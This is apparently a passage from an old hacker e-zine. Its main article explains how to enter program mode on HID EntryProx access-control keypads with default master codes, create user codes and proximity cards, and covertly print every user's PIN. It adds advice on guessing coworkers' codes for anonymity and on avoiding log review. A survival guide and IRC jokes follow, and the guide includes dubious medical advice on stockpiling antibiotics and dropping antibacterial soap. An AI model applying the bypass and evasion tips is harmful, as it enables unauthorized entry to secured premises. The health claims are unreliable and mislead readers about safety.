fying end-user needs for security, safety and convenience." The ASSA ABLOY
Group is 30,000 workers strong and rakes in about 3 Billion EUR annually.
This article will focus on the HID EntryProx series of cards and readers.
The unit is mounted on the wall next to an entryway to any secure area. A
reader and a reader with a built-in keypad. This keypad will be what we
are looking for in attempts to re/program the HID EntryProx unit. We will
learn a little more about what happens when you punch in your five digit
code or wave that magic Wiegand card.
The following a generic log which will help you understand why the next
paragraphs are important:
04/15/04
# Time Action
1 20:32 User 0015 Print
2 20:23 User 0011 ACCESS
3 20:22 User 0011 ACCESS
4 20:22 REX
5 20:22 Forced Door
6 20:21 User 0011 ACCESS
7 20:21 Forced Door
8 20:21 User 0011 ACCESS
9 20:20 Forced Door
0 20:20 User 0002 ACCESS
1 20:20 User 0002 ACCESS
2 20:19 User 0002 ACCESS
3 20:19 User 0003 ACCESS
A few things to note for safe playing would be to keep in mind that the
company or people monitoring these units will review access logs (see
above). If they see that a unit entered program mode, changed or encoded
a card, exited, followed by your code being entered to grant access only
moments after - it's safe to say any well monitored system will end in
your questioning.
Play with codes, never use your own if you plan exploring. Most companies
will have a rather strict format in their codes which will allow you to
easily guess other codes. These found codes will aid in your anonymity if
you plan on playing with AC units in your workplace.
Your company will more than likely frown on this type of exploration and
may end in revoked access or even termination from the company. There is
a fine line these days between "terrorism" and information. It's a very
scary thought. Just be safe and use common sense.
.:::::::::::::::::.
.: HID EntryProx AC (Access Control) system overview :.
Though HID develops a wide array of AC systems in use today, we will be
looking at the EntryProx (Model# 4045) reader equipped with a keypad.
The EntryProx has a long list of features which makes it great for this
article. Most of the features and programming meathods can be applied to
other AC units as well. The EntryProx is pictured below.
http://www.hidcorp.com/products/proximityproducts/entryprox.html
The reader is black in color and usually mounted on the wall directly
next to the secure area. The reader has a very impressive list of pro-
grammable features which we will review later in this article. The unit
is is 5.25"x2.75"x1.625" in size and has a typical range of 1" to 3"
(depending on the card used) and will auto delay one second between card
reads to prevent the unit from reading the card more than once per swipe.
These systems are equipped with an internal tamper switch which will act-
ivate an alarm if the unit is dismantled. The EntryProx can be mounted
indoors or outside and will resist temperatures of -31 to 150 degrees
Fahrenheit or -35 to 66 degrees Celsius.
The standard format of code entries are 12345#. The * key may be used
before entering a code to clear any pre buffered or incorrect codes
before entering your code and pressing # (or essentially 'enter'). The
unit in an active (non program) mode will store or buffer 10 keys (with
parity, 11 without) before transferring the information over the wire.
With all access codes being only five digits it is essential but not
always necessary to be able to clear pre buffered keys by using the *
key before starting. The system will delay 5 seconds before auto clearing
any buffered key entries, so you must press each key within 5 seconds of
each other or start over.
The unit will contain three main LEDs. A Bi-Color (Red/Green) and Amber
LED to serve as our display and also an Infrared which can be used to
communicate with an optional palm printer. The unit also has an audio
feature to beep when keys are pressed or in program mode to give audio
conformation of a correct of incorrect code or command.
The status of these LEDs will be reviewed in the "Programming HID AC
Keypad units and encoding proximity cards" section of this article. As
a good rule of thumb though, green means open, red means locked, amber
means you are in programming mode.
The keypad is arranged like any standard telephone keypad. The reader
will output each key as an ASCII hexadecimal digit which is sent to the
host system. The host system will be running software which will monitor
and deploy entry and user codes to specified door numbers in which a user
will be given access.
So by the rather bland list above we see the important features these
systems have. We know we can gain access by entering our preprogrammed
five digit code or simply by waving our encoded card in front of the
unit itself.
In the next section we'll find out what happens when we use a Proximity
or Wiegand card and how it works.
.:::::::::::::::::.
.: The Wiegand Protocol/Effect - A dirty primer :.
If you have ever looked up information about access control you have
without a doubt heard about the Wiegand Protocol. The only problem is,
you never really see or read about how this Wiegand Protocol works.
So let's check it out.
First of all it's good to know that the Wiegand Protocol is also known
as the Wiegand Effect and that it was discovered by John R. Wiegand and
took nearly 40 years of research to develop. This sensor technology was
first used in access control systems developed by HID and is now a sta-
ndard for most of todays AC systems.
A lot of the magic involved with the Wiegand Effect is in the underlying
wiring of the card itself. Yes, these Wiegand cards have actual Wiegand
wire right inside. Take this 'simple' explanation of the Weigand Effect:
"Wiegand Effect technology employs unique magnetic properties of speci-
ally processed, small diameter ferromagnetic wire. By causing the magn-
etic field of this wire to suddenly reverse, a sharp, uniform voltage
pulse is generated. This pulse is referred to as a Wiegand Pulse."
OK let's be honest, you probably have no clue what ferromagnetic means
so just to make sure you understand this, here it is:
fer·ro·mag·net·ic - adj.
Of or characteristic of substances such as iron, nickel, or cobalt and
various alloys that exhibit extremely high magnetic permeability, a
characteristic saturation point, and magnetic hysteresis.
Have you ever looked at the definition of a word, then had to look up
a word found in that definition? Well now you have.
hys·ter·e·sis - n.
The lagging of an effect behind its cause, as when the change in magne-
tism of a body lags behind changes in the magnetic field.
OK, let's make sure we not only read this, but comprehend it as well.
We see now that the card will have this ferromagnetic Wiegand wire coiled
right inside of the card itself. This wring has special magnetic properties
which are created by the actual twisting and coiling process used to make
these wires. The EntryProx wall unit has a sensor built in that will tri-
gger when a Wiegand wire (which is in the card) is presented. This happens
in the very simplest of terms by changing polarity referred to as the
Wiegand Pulse. This pulse or jump in voltage is essentially what triggers
the unit to unlock the door. The exact amplitude of the Wiegand Pulse can
vary depending on the sensor and card but the pulse will generally stay
the same allowing it to trigger the wall unit.
Now when you read this you might be wondering if any Wiegand card will
open or activate any sensor/reader. The answer is yes and no. These cards
can be encoded, or rather the Wiegand wire can be processed to create a
card which will handle up to 84bits which can actually create up to 137
billion unique codes, very impressive! The standard Wiegand card will be
26bits however and will handle a total of 65,535 unique codes. Due to the
cost many, some what smaller companies will probably use this. HID will
resell these same cards to various companies. Which does mean yes, if you
have a 24bit Wiegand card, there is another reader out there that will
accept your unique Wiegand pulse for entry! Don't get too excited though
this is a very slim chance. A cool thing about it though is once you
finger hack a five digit code (aka PIN) on the keypad to grant access,
you can program a card to have it's Wiegand pulse associated with your
five digit PIN. Meaning you absolutely can make your very own ProxCard,
though you will need a working PIN first and a ProxCard to encode.
Okay before we move on here it is to be understood that the above is a
very dirty primer to this technology. I assure you Mr. Wiegand himself
would slap me across the face for taking 40 years of his research and
presenting it in such a dumbed down way. However for those interested
I will be listing a few of documents in which I have studied to create
this article. Please, take the time to read these if this interests you,
the science, mathematics and technology behind this is very interesting
and will no doubt excite you.
First up is the "Introduction to Magnetochemistry" by David Young. This
article is packed with great information on study of magnetochemistry.
Second is "Theoretical Analysis of the Influence of Different Microstr-
ucture on Barkhausen Noise" by Li Qiang of the College of Mechanical
and electric Engineering, Beijing. This delves into Barkhausen Noise
which occurs in the Wiegand effect. This was not covered to limit the
complexity of this article.
Third would be "The Science of Hysteresis" by Gianfranco Durin and
Stefano Zapperi. If you get a change to read some of the amazing
things these two have written you will see why this all goes far
beyond the scope of this article.
Now that you have a basic idea of what happens in the Wiegand Effect
lets go ahead and get to some of the fun stuff.
.:::::::::::::::::.
.: Programming AC Keypad units and encoding proximity cards :.
Yeah that's right these babies are programmable! We can enter a program
mode to do some pretty neat things once inside. The only thing is, well
need a master code. Now this master code is thankfully only four digits
long and will in most cases, be very generic. The default master code on
these units is 1234*. Pretty funny right? Well what's more is that in
HID documentation and installation manuals they suggest changing this
right away, but never say something ultra uncommon like say 7246*. HID
actually makes reference to changing this code to 4321*. Now any moron
will know this isn't any more secure than 1234* but in big business
people lose jobs, they come and go and policies are changed. Many
companies will want a very easy to remember code such as the address,
or part of the companies main telephone number. Keep these things in
mind when hunting for the master code. Were not looking for the master
code of the installer himself, we looking for the master code of the
company which uses these systems. If your company forgets this master
code, a service call from HID is their only hope. Most companies want
to stay away from
this expense.
Once we know the master code the system will, with correct number seq-
uence, obey our every command. Let's go ahead and take a look at what
we can do once inside.
\\\\
Master Code: Default to 1234*
This master code allows for just about anything. Programming new codes,
erasing old ones. Etc. You'll see as you read.
Self test mode: 7890#123456*
This will light the LEDs and make sure all keys are functioning.
////
Program Commands:
Enter program mode:
99 # (Master Code) * :: If things are kept default this would be 99#12
34* :: If successful the Amber light will slowly blink, and you will
now be in program mode.
Changing the Master Code:
1 # (new master code) * (new master code again) * :: In many of the
technical manuals available they suggest changing the master code
right away. Too bad they suggest a new master code like 4321*.
Obviously this is just an example given by them, but I'm sure there
are quite a few companies using this code believing it's more secure.
Obviously changing this code will piss a few people off once they find
out and may end your programming fun by means of increased logging and
security measures.
Setting the main relay time:
11#tt#0#** :: tt = 1-99 seconds and uses a two digit format.
Setting AUX relay output:
15#output#0#** :: Output = 0/Disabled, 1/Shunt, 2/Forced door, 3/
Propped door.
Deleting Users:
user-location#** :: Facility location codes.
Print a transaction log:
70#0#0#** :: This might freak some of the monitoring staff out when
you print this up.
Setting or clearing standard options:
30#option#set/clear#** :: Option is a value from 1 to 13. Set/clear
is either 0 or 1 (off or on respectively) these options and values
are listed below:
0. Audio Key press (key beep) // 0=OFF, 1=ON // On by Default
1. Visual Key press (LED light up on key press) // 0=OFF, 1=ON //
On by default
2. Auto Entry Enable // 0=OFF, 1=ON // Off by default
3. Standalone/Wiedand mode (Turn on/off ProxCard access) // 0=Stand
alone, 1=Wiegand // Standalone by default.
4. Facility Code Access // 0=OFF, 1=ON // Off by default
5. Forced Door Alert (Kick the door open and the system is notified)
// 0=OFF, 1=ON // On by default.
6. Propped Door Alert (Keep the door open and the unit will beep) //
0=OFF, 1=ON // On by default.
7. Internal rex switch (Request Exit switch) // 0=OFF, 1=ON // Varies
by model.
8. US/EU Date Format // 0=OFF, 1=ON // 0=US, 1=European // US (0) by
default.
9. Wiegand red LED enable (Flash red LED when ProxCard cannot access)
// 0=OFF, 1=ON // On by default.
10. Wiegand red LED active state // 0=LOW, 1=HIGH // Low by default.
11. Wiegand green LED enable (Flash green on access) // 0=OFF, 1=ON
// On by default.
12. Wiegand green LED active // 0=LOW, 1=HIGH // High by default.
13. Daylight Savings time (set DST support) // 0=OFF, 1=ON // On by
default.
Print a programmed user list:
25#0#0#** :: This will print all users & their corresponding codes
which are programmed for access.
Print a programmed user list starting with a certain user:
25#0#starting user#**
Change Wiegand Parameters:
32#parameter#value#** :: See below for parameters and their values.
Parameter:
0 = Wiegand pulse count :: Value = 1-255
1 = Wiegand interpulse :: Value = 1-255
2 = Facility code :: Value 0-255 :: Default is set to 0.
Set system time:
41#hhmm#0#** :: Keep in mind the system uses the 24 hour time format.
Set system date:
42#mmddyy#dow#** :: dow stands for day of week. 1 = Sunday, 2 =
Monday, 3 = Tuesday, etc...
Set door number:
43#nnnn#0#** :: nnnn equals the corresponding doors number, in a four
digit format.
Set propped door timer: (Set to 30 sec. & alarm will sound after 30
seconds.) 44#ttt#0#** :: ttt = Time in Values of 10's, Valid entries
are 10-990 :: Default is 30 seconds.
Set forced door timer: (Alarm will sound xx seconds after door was
forced open.) 45#ttt#0#** :: ttt = Time in Values of 10's, Valid
entries are 10-990 :: Default is 10 seconds.
Delete memory/Restore system defaults: (Note: This will not delete
the user list.) 40#00000#00000#**
Delete all memory & Restore defaults: (Note: I believe this will
delete the use list.) 46#00000#00000#**
Program user: (This will program the a new code only) 50#user-type#
userlocation#code*repeatcode* :: Se below for values.
User type = 0/Toggle latch door strike, 1/Normal access, 2/Log Dump,
3/Lockout. User Location = This may be set to 0 in most cases as
this is referring to the facility code. Code = New 5 digit user
code. Repeat code = Enter the 5 digit code again.
Program user & Card: (This will program a user & encode a ProxCard
card.) 50#user-type#userlocation#code*repeatcode*<present card> ::
On <present card>, hold the proxcard to the unit.
Program card only: (This will take a current user code and program
it to a card) 50#usertype#userlocation#**<present card> :: On <pre
sent card>, hold the proxcard to the unit.
Program card user manually: (Use this to enter a precoded ProxCard
into the system 26-bit Cards only) 51#usertype#userlocation#card
PIN*card PIN* :: The card PIN will appear on the ProxCard, the
facility code must be entered first.
Program User: (Code or a Card.)
52#usertype#userlocation#code*repeatcode*<present card>
Program codes in batch: (Program xx amount of cards at once.) 56#to
talusers#userlocation#card PIN*card PIN* :: (I understand why the
format is easy to guess now ;P)
Print Transaction Log via IR port. (You can print out an entire
days worth of access logs) 70#0#0** :: This will print the access
log but not the PINs.
Printing a programmed user list:(You can print out an entire days
worth of access logs complete with access times and PIN numbers!
This log differs from the one found in the intro section in that
it is more detailed.) 25#0#0#** :: Imagine printing a log of
coming and going users & their codes from the unit to a small IR
printer in a backpack, talk about access. Note that the IR sensor
must be placed in line of sight to the wall unit and must be held
very close.
Set transaction log mask: (set or clear event logging :: 1=set,
2=clear) 73#event#set/clear#** :: (events listed below)
Event:
01 = Access Denied
02 = Program Denied
03 = Program Mode
04 = REX (Request to Exit)
05 = Door Ajar
06 = Door Closed
07 = Forced Door
08 = Log Erased
09 = Facility Access
16 = Print
17 = Access
20 = Toggle ON
21 = Toggle OFF
24 = Lockout ON
25 = Lockout OFF
27 = Mismatch
Reset/Erase transaction log:
76#00000#00000#**
Exit Program Mode:
*(after final command) :: Amber light will stop flashing.
\\\\
As you can see these Access Control units have quite a few
features available to them straight from the keypad. It also
helps to know that what we are doing is either working or not.
Beeps and LEDs will be your guide.
////
LED Status and meanings.
The Amber LED:
Slow blink = Unit is in program mode.
Rapid Blink = Verify mode is active.
Steady (always on) = Program error. To clear simply press *
Very rapid blink = Memory (EEPROM) erase is in progress.
The Red & Green LEDs:
Steady red = Door strike is locked.
Steady green = Strike is energized (timed open and will auto lock
in xx amount of time) Solid green w/red flicker = Door strike is
locked and the user has activated the lockout sequence. Red/Green
alternating = Waiting for second PIN during the card and code
access attempt. Red blink = User lockout is active and strike is
locked.
Sounder (Beeps):
Short beep = Propped door is active
1/2 sec on, 1/2 off = Forced door is active.
3 rapid beeps after code or card is presented = Code or card is
not found. 3 Slow beeps then a single beep = Self test is
finished. 1 single beep = Valid card access
\\\\
Now another cool and very scary note is that a ASSA ABLOY company
called Sargent makes a line of electro-mechanical keypad units
for home use. Yeah, people are installing these on their front
doors for easy access without a key. The only problem is, they
can be programmed very easily (see above section, it does apply
to these aswell). If you get a chance you can head down to your
local hardware store and see these on display - you can play with
them without doing much harm.
.:::::::::::::::::.
.: Conclusion :.
As we now know access control is the art of physical authentica-
tion to access secure areas. This form of security by no means
ends here, there is a world of information out there just waiting
to be uncovered about these clever little systems. It is also
important to note that since HID is the company developing this
technology a lot of other access control system developers are
following suit in the way their units are programmed. Which yes,
means these program codes can be used in systems and applications
from HID, Paxton Access, Inter- national Electronics Inc. (IEI),
IB Technology, Impro and others! These systems can be found any-
where from your home or office, even candy machines. Seriously,
if you score some candy hook me up!
I encourage anyone who is inspired by access control security to
contribute information about biometrics or even time clocking
using this technology.
This is merely a scratch on the surface of access control and I
hope all who read it feel it was worth their time. Ignorance is
not a form of security so read, contribute and help others unde-
rstand that the things we do are not with malicious intent. Use
this information to your liking but remember, like guns the
information we have can be used to protect or harm, everything
has its rewards and consequences. Sleep well.
- GLHeX (11/04)
-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O
<Wizbone> I'm imature
<Wizbone> immmature
<theclone> *immature
<Wizbone> oh, I was so close
<tek> imaturemer
<theclone> but so far away
<MadCat> I-Mature
<tek> Apple iMature
* MadCat copyrights
<theclone> iMature - Porn from Apple Computer.
<persephone> lol
<tek> hahaha
<MadCat> hehehe
Surviving The Fall of Society
Written by:
Doobie Ex
Preface
-------
This guide is meant to lay the ground work for the successful survival
of a large scale nuclear or biochemical attack and the imminent coll-
apse of society in it's wake or the collapse of society by any other
means. Much of the material inside is from FEMA H-14 a prepardness
guide that is no longer publ- ished. This guide also contains material
and ideas from Ark Two Community, a group without any political, reli-
gious, or cultural bias. Whose purpose is to ameliorate the catastrophe
of a nuclear war and to help restore civilization.
This book will focus on survivial using the Cooperative Village System.
The CVS is alot like communism.The CVS differs from communism in the
fact that there are no leaders. There isn't room for a leader. Everyone
has a job and must work together to survive. If you and one of your
fellow citizens have a disagreement this must be set aside or you will
not survive. Everyone should be mature enough to overcome such difficu-
lties with relative ease.
To further define:
Village: A group of 10 or more people working together to better their
odds of surviving the aftermath a nuclear, biological disaster, or the
fall of society by any means.
Citizen: A member of the abovementioned group..
Chapter 1: Understanding/Surviving Threats
The first step in surviving a large scale nuclear/biochemical attack is
to understand the behavior of the weapons being used.
Nuclear Weapons
This graphic illustrates the behavior of a 1 megaton nuclear blast:
http://www.nettwerked.net/1.gif
A 100 megaton blast is twice as powerful as the impact created by the
meterorite that resulted in the Barringer Crater located in Arizona:
http://www.nettwerked.net/2.jpg
An attack on US populace centers with 100-megaton nuclear warheads
would kill up to 20% of the population immeadiately via blast, heat,
ground shock and instant radiation effects. An attack with 1,000 1
megaton nuclear weapons (much more likely) would result in the immed-
iate death of half the population.
The few who do survive the initial blast are far from safe. The esti-
mates above do not include additional deaths from fires, starvation,
or the lethal fallout showers to the ground downwind of the explosion
which would result in skin burns, acute radiation sickness which incl-
udes nausea, vomiting, diarrhea, fever, and noticeable blood changes.
Rad Scale Doseages between 400-800 RADS are lethal.
---------
One way to measure radiation is in Rads. The lethal dose for 50% of
the exposed population of humans is 400 Rads. Here are some short-term
effects of different doses of radiation:
0-25 Rads - No apparent short-term effects.
25-100 Rads - Blood changes are noticeable.
100-200 Rads - Some toxic symptoms of weakness, fatigue, nausea, vomi-
ting, diarrhea, fever, and infection. Hair loss, skin spots, hemorr-
haging, and some instances of heart failure may also occur.
200-450 Rads - Symptoms are the same as the previous exposure level,
except that they are more extreme. Will prove fatal to 25-50% of those
exposed.
450-600 Rads - Symptoms of previous level only even more sever and
sooner. Illnesses include mouth, throat and skin hemorrhages. Will
prove fatal for 50-75% of those exposed.
600-800 Rads - Previous symptoms plus circulatory and nervous system
failure. Medications can control some of the symptoms and make the
patient more comfortable, but can't defy the inevitable. 100% of
those exposed will die. How far the nuclear fallout travels and the
doses those who are in range of the fallout receive depend on weather
and other such conditions. It has been estimated that an explosion of
a one-megaton nuclear weapon at ground level in 15 mph winds would
produce fallout extending hundreds of miles downwind. At a distance of
20-25 miles, a lethal radiation dose (600 Rads) would be accumulated.
Long-Term Physical Effects
--------------------------
Those that survived the explosion and the fallout that followed would
still have to deal with effects for years after. Exposure to radiation
increases a person's chances of cancer, and also decreases life-span.
Another long-term effect would be genetic damage. Radiation can alter
the sperm or egg cells in a person, which may result in different
genetic diseases. These effects may appear in the exposed person's
direct offspring, or may appear several generations later, depending
on whether the altered genes are dominant or recessive.
Short-Term Environmental Effects
--------------------------------
In nuclear explosions, about 90 percent of the energy is released with-
in one millionth of a second. Most of this is in the form of heat and
shock waves. When a weapon is detonated at the surface of the earth,
the heat vaporizes nearby structures and underlying soil and rocks.
Anything within a 5 mile radius doesn't have a chance.
In the event of a nuclear attack make your way to your village shelter
as quick as you can. Assuming you are not close to the blast you should
have anywhere between 30 minutes to 2 hours to prepare for the fallout.
Biochemical Weapons
-------------------
Biochemical weapons are much different than nuclear weapons. They can
be deployed in many ways. One manner in which they can be deployed is
via mail, enclosed within parcels sent to unsuspecting victims. Another
way is in mortars packed with a biological agent usually in the form of
powder or gas which explodes on impact releasing it's deadly cargo.
After the agent has been released it spreads through the air quickly
infecting everyone it comes in contact with.
Surviving a Biochemical Attack
-----------------------------
The firt step is to be vaccinated for all Class A biological threats.
They are as follows. Anthrax, botulism, plague, and smallpox.
BIOLOGICAL THREATS TO REMEBER
-----------------------------
Botchulism
Smallpox
Anthrax
The second step is to obtain anti-biotics from one's doctor to combat
these diseases. One should not commence taking them as soon as he/she
obtains them. Anti-biotics should be kept for use in the event of an
attack. One should aslo immeadiately discontinue the use of anti-
bacterial agents such as hand-soap, dishwashing liquid, and detergent.
Instead, opt for natural hand soaps and the like. Discontinuing the use
of these anti-bacterial items will allow one's body to strengthen it's
immunities.
Materials To Keep on Hand
-------------------------
Duct Tape The average roll is somewhere between 160-180 feet total.
Measure all of the openings in your home. If one calculated properly
one should be able to figure out how much is needed.
Plastic Sheeting One will should measure the windows, doors, and
other openings in his/her home in order to tell exactly how much is
needed. Keep extra as well. Mistakes happen.
Flashlight(s) + Extra Batteries/Bulbs One for each member of the
household as well as extras incase of guest.
Radio Prefferably a wind-up model. They can be found in many outdoor
stores and magazines. They can also be purchased on Amazon.com at a
reasonable price.
Gas Masks + Extra Filters Purchase only new gas masks. Used masks
tend to be very unreliable in quality.
You should also keep food on hand. Nothing that ivolves too much pre-
paration. MRE's are ideal, they can be purchased on the Internet at
a very economical price.
One should also keep these supplies in his/her automobile so that they
may be accessed in the event you are stranded in your automobile or in
a hotel/motel.
Responding To a Biochemical Attack
----------------------------------
If one recieves advanced warning of a biochemical attack in his/her
area he/she should go home or to another safe place such as a hotel/
motel room immeadiately. As soon as one is in a safe place follow the
steps below.
Seal all windows with plastic and duct tape. Also seal all exit doors
but one (until the last), including any doors that lead to a garage.
Close the fireplace flue and seal the hearth opening with plastic and
duct tape. Seal all vent openings: inside the attic, under the house,
above the stove, for the dryer hose, the sink, washer, bathtub, shower
drain holes and any other openings where air can enter.
If there is time, be sure that all windows in all of one's automobiles
are rolled up tight, and the windows and any vents with plastic and
duct tape. This will not prevent air from coming up from under the car,
but it will keep out poisons that fall directly onto the car. As soon
as it's declared safe to go outdoors gather items the items that you
need and get to the village shelter as fast as possible in case further
attacks follow.
Chapter 2: Finding A Location For Your Village
Finding a location for a village seems like a simple tasks, but it
really isn't. First one must find a location for the village that
is a considerable distance from any major population or industrial
centers.
As an example Maine has been chosen. The reason: Maine is the most
rural state in the U.S. Here is a picture illustrating predicted
strike points in Maine:
http://www.nettwerked.net/3.jpg
Note: Any area that is likely to be the subject of a nuclear strike
is also a likely strike point for a biochemical attack as well.
After studying the picture I am sure you can see that building a
survival shelter somewhere in the middle of the state would be the
safest. Although none of these predicted blast points is particul-
arly likely as these are predicted Soviet strike points. Any current
threat is more likely to strike at our cultural symbols. Such as,
New York City or Los Angeles.
A comprehensive list of all 50 states can be found here at the foll-
owing address. http://www.webpal.org/webpal/d_resources/list.htm
This picture illustrates the prevaling wind pattern and how it might
distribute fallout:
http://www.nettwerked.net/4.jpg
Red: Severe Fallout Levels
Yellow: Mild Fallout Levels
The areas in red will have the most severe fallout. Areas in yellow
will receive mild amounts of fallout. Those unmarked will recieve
little if any at all. As one can see Maine is subject to more fall-
out than some of the other states especially in the far west. Maine
is in someways still safer than other states. Because it has no
large population centers it is highly unlikely it will be subject
to and direct nuclear or biochemical engagement at all.
REMEMBER THESE STATES
Montana
North Dakota
South Dakota
Nebraska
Missouri
Colorado
All states east of those mentioned above are subject to heavier
amounts of fallout than those to the west of them.
The states listed above are part of what's called a "dense pack".
A dense pack occurs when target sites are extremely close together.
This does actually serve a purpose. It is called missiles protec-
ting missiles. Thes sites are reffered to as "hardened sites" mea-
ning it takes a direct ground explosion to dig them out. Ground
explosions throw many tons of dust and debris into the air. This
is what will eventually become fallout, carried by the wind hun-
dreds of miles away by the prevaling wind pattern.
Directly over the site that has just been hit the sand and grit
in the air is very thick for quite a while. Another high speed
missile (ICBM) trying to come through it will have its skin torn
off just like by sand blasting and it will be destroyed. Other
missile sites nearby are safe. On the other hand, because miss-
iles take off much slower than the speeds they eventually reach,
the missiles in the undamaged silos can still be launched and
will pass through the dust cloud without being harmed. There is
a purpose in putting so many in one place.
The only way that one can dig them out is with what is called a
slow walk. Hit a target. Move on further and hit another target
where the dust from the first won't damage the missile. Thirty
or forty-five minutes later hit a second target near where the
first was hit, after the cloud has had time to blow away. A slow
process. Some silos will already have launched and the shot will
be wasted. Others can still wait to launch later because the
enemy can only strike on site at a time.
Here is a picture of North Dakota illustrating the dense pack/
slow walk defense/attack method:
http://www.nettwerked.net/5.jpg
Chapter 3: Constructing and Organizing Your Village
The Village Center
------------------
Each village should center around a well built survival facility.
The Ark Two Community chose to use 49 school bus cabs surrounded
by concrete and earth (shown below) as a means to efficiently
construct a shelter. Although creative it is not necessarily
the best built shelter for the money.
Here is a diagram of the "Ark-Two Survival Group" disaster
shelter:
http://www.nettwerked.net/6.jpg
The best alternative economically and structurally in terms of
durability is a shelter comprised of geodesic domes constructed
from rebar and concrete. This is both offordable and efficient
when compared to other means of constructing such as brick and
mortar.
A company located in Italy, Texas called Monolithic builds their
own brand of geodesic dome structures called "Monolithic Domes"
Monolithic Domes are FEMA and energy star approved. This means
they are both energy efficient and capable of withstanding cer-
tain types of disasters. They (disasters) include tornadoes,
hurricanes, and indirect nuclear explosion.
Monolithic offers a workshop at their Italy, TX headquarters.
The workshop lasts 5 days and costs $975.00 per person. The
course will cover all aspects in building a dome. Experience
then may be applied in building the domes as a contractor or
sub contractor.
CONTACT MONOLITHIC
177 Dome Park Place - Italy, TX 76651
Tel (972)483-7423 - Fax (972)483-6662
htto://www.monolithic.com/
Ultimately each village must decide for itself how the shelter
is to be constructed. Things to take into consideration are
things such as the life of the structure and cost vs quality.
When constructing a shelter refer to Ark Two Survival Group
for examples.
*All shelters should feature EMP protection so that electronic
equipment is not damaged*
Above ground a structure (preferably a dome) should be const-
ructed. This structure should contain pre-cut materials for
the fabrication of village structures. These structures should
be joined together by bolts not nails so that they may be dis-
assembled and moved if necessary (include extra materials).
Stocking The Shelter
--------------------
Stocking a shelter is something that will vary from shelter to
shelter. Things that should be included in every shelter are
things such as geiger counters, potassium iodide (anti radiat-
ion pills), gas masks, hazmat suits, post attack clean-up
equipment, and MRE's .
Other things that need to be stored are tools, seeds (for crops,
herbs, etc), and literature pretaining to each trade to be used
as refference. One might also consider storing things to pass
the time in a shelter. Things such as gameboys (with extra bat-
teries), books, magazines, mini-dvd players+movies, etc.
*!CITIZENS IN THE VILLAGE!*
Citizens In The Village
-----------------------
Each citizen should have a specialization. I have compiled a
list of some of the necessary skills to give a general idea
of what is required to sustain a village.
NECESSARY SKILLS
Farming
Primitive Cooking
Carpentry
Smithing
Natural Fiber Processing
Human Waste Composting
First-Aid
Herbal Medicine
Learning these necessary skills is a mix of reading and pract-
ice. Below is a list of recommended reading materials and URLs
All of the books listed can be found on Amazon.com.
Farming - Farming is a subject where there is an infinite
amount of source material. One would reccomend reading as
much information as one can come accross on the Internet.
One book that seems most helpful is "Successful Small-Scale
Farming: An Organic Approach".
Most of what is covered in the book can be practiced in one's
own back yard. Some alterations may need to be made in the
methods used.
Primitive Cooking- http://www.primtiveways.com/ The web-site
should give one a good starting point. In many heavily wooded
regions there are quite often survival camps/courses. If one
is truly interested in master primitive cooking he/she should
probably enroll in one of these camps/courses.
Carpentry- Carpentry does not merely mean the ability to use
a circular saw and put nail to board. What is intended is a
mastery of the art. The ability to fell a tree and turn it
into a chair. To take materials from their rawest form and
make them into something functional.
"The Big Book of Self Reliant Living" features a number of
fabrication techniques. One might also find books at a local
library that can assist.
Blacksmithing - There are a number of books covering this
trade. This book is a good place to start, "Blacksmithing
Primer: A Course in Basic and Intermeadiate Blacksmithing"
Processing Natural Fibers - No appropriate source material
for this subject could be located at the time of release.
Human Waste Composting - "The Humanure Handbook" should
explain the process entirely.
First Aid - Nearly every area offers First-Aid courses
along with certification. These techniques must adapted
to use herbal substitutes and natural fiber bandaging.
Herbal Medicine - Herbal Medicine is a skill of the utmost
importance. There are a number of guides and dictionaries
featured on Amazon.com. One should try to read as much
literature as possible on this subject.
Skills To Consider
Bowmaking/Fletching
Tayloring
Tanning
Brewmastery (Alchohol eases stress)
Radio Operation
There are an infinite amount of skills to consider. You
should be able to prosper with only those listed as
necessary. However, other skills would make like more
comfortable.
Natural Water Purification
The Final Step in Self Sufficiency
Water purification is a problem that every country in the
world faces and none have yet to solve it. If prescense
of human waste is eliminated from the water (effectively
done by waste composting) then a large portion of the job
is done. The human waste now eliminated opens the door to
simpler, natural water purification techniques.
The most effective natural purification technique seems to
be the application of water hyacinths. These plants ingest
pollutants and leave the water relatively clean. If allowed
to flourish in openly in streams hyacinths will waste no
time in clogging these streams and making a general nuisance
of themselves. It seems that diverting a portion of a stream
/river into a pond is the only safe way to impliment hyaci-
nths. The plants effectively clean the water and are not
allowed to spread into the nearby water-ways.
Hyacinths must be harvested at regular intervals. These har-
vested hyacinths could be dried to create fertilizer or
composted along with human waste.
Now that the water is relatively free of bacteria you can
move on to the next problem. The prescense silt in drinking
water. Silt can easily be removed through a number of simple
filtering techniques. Be inventive and come up with your own.
Chapter 4: Post Collapse
If a nuclear attack has occurred there is bound to be fallout
everywhere outside of the shelter. There is a wealth of inf-
ormation about fallout clean-up that exists on the Internet
so it will not be addressed here. There is also a wealth of
information on clean-up following major biochemical attacks
therefore it will not be addressed here either.
First Things First
------------------
If a nuclear/biological attack has occured then someone will
have to venture outside in order to determine if the outside
is safe for activity. Once the area outside has been deemed
safe clean-up should begin. Once the general area has been
cleaned then the storage building should be opened and the
disassembled structures
inside should be removed and assembled.
When the village structures are complete everyone should
move above ground into the new structures. The shelter
should act as sort of a base of operations during this
phase. If it is still winter then everyone should keep
refuge in the shelter until it is warmer.
During the first growing season things may be a little rough.
However, things should pull through. Periodic harvesting and
canning should be done to insure there are provisions for the
colder months. When the colder months arrive things shouldn't
be too rough. Hunting should be perfectly safe by this time.
Be sure to kill wild game to supplement existing supplies.
Time Rolls On
-------------
Society no doubt will eventually pull itself back together.
Someone will eventually happen upon your little village and
you will integrate back into society. Educate your children
well about our society, teach them right from wrong. Instill
in them principles which will hopefully keep this kind of
thing from happening ever again.
From the author:
I hope you enjoyed reading this guide. I know it's not a work
of art. I do not possess the literary faculties of the greats,
but I am doing my best to convey my ideas. This will not be
the last release. Many changes will be made and the guide will
expand. Some things were not included because they have not
been properly evaluated or were overlooked altogether. Sugges-
tions and additions may be sent to: DoobieEx [at] hotmail.com.
Credit will be given to those that contribute.
-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O
<caesium> dialup is like an incomplete hand job.. no payoff... its just
one big networked blue balls experience.
'''''''''''''''''''''''''''''''''''
Another malware file by Aftermath
